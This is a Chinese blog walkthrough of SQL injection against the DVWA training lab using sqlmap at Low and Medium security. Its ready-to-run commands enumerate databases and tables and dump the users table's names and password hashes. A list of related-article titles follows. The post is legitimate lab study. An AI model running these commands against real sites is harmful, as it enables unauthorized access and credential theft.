当前位置: 首页 > web >正文

使用sqlmap的SQL Injection注入

DVWA | SQL Injection(Low,Medium)

sqlmap自动化注入(Low):

召唤sqlmap:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3"

拿到探测到注入漏洞:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dbs

 拿到数据库名:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --current-db

拿到当前数据库表:

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --tables -D "dvwa"

拿到表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --columns -D "dvwa" -T "users"

拿到users表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=o31gnvl55d8dm3p21rji46c6r3" --dump -D "dvwa" -T "users" -C "user,password"

拿到用户名和密码:

 sqlmap自动化注入(Mdeium):

探测注入漏洞:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit"

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dbs

 探测当前所在数据库:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --current-db

探测数据库表: 

sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --tables -D "dvwa"

 探测user表结构:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --columns -D "dvwa" -T "users"

 提取用户名和密码MD5:

 sqlmap -u "http://192.168.1.99/dvwa/vulnerabilities/sqli/#" --cookie "PHPSESSID=o31gnvl55d8dm3p21rji46c6r3; security=medium" --data "id=1&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"

http://www.xdnf.cn/news/15300.html

相关文章:

  • Kafka Schema Registry:数据契约管理的利器
  • 指令微调时,也要考虑提示损失
  • 多模态数据解压-Parquet
  • 精密模具大深径比微孔尺寸检测方案 —— 激光频率梳 3D 轮廓检测
  • Apache HTTP Server 从安装到配置
  • 【Linux仓库】虚拟地址空间【进程·陆】
  • 未来软件开发的新方向:从工程到智能的深度演进
  • Claude Code:完爆 Cursor 的编程体验
  • 剑指offer——链表:从尾到头打印链表
  • 上位机知识篇---SD卡U盘镜像
  • [论文阅读] 人工智能 + 软件工程 | LLM辅助软件开发:需求如何转化为代码?
  • 链表算法之【判断链表中是否有环】
  • 千辛万苦3面却倒在性格测试?这太离谱了吧!
  • 【C++】内联函数inline以及 C++入门(4)
  • 自动评论+AI 写作+定时发布,这款媒体工具让自媒体人躺赚流量
  • C++(STL源码刨析/List)
  • PyTorch中的torch.argmax()和torch.max()区别
  • 标准化模型格式ONNX介绍:打通AI模型从训练到部署的环节
  • 基于Springboot+UniApp+Ai实现模拟面试小工具二:后端项目搭建
  • 上位机知识篇---安装包架构
  • java集合类
  • 输入流挂起
  • 人脸图像生成(DCGAN)
  • Java线程进阶-并发编程
  • python的病例管理系统
  • halcon 求一个tuple的极值点
  • 性能狂飙 Gooxi 8卡5090服务器重新定义高密度算力
  • 深入剖析Spring Bean生命周期:从诞生到消亡的全过程
  • JavaSE——Object
  • Linux驱动基本概念(内核态、用户态、模块、加载、卸载、设备注册、字符设备)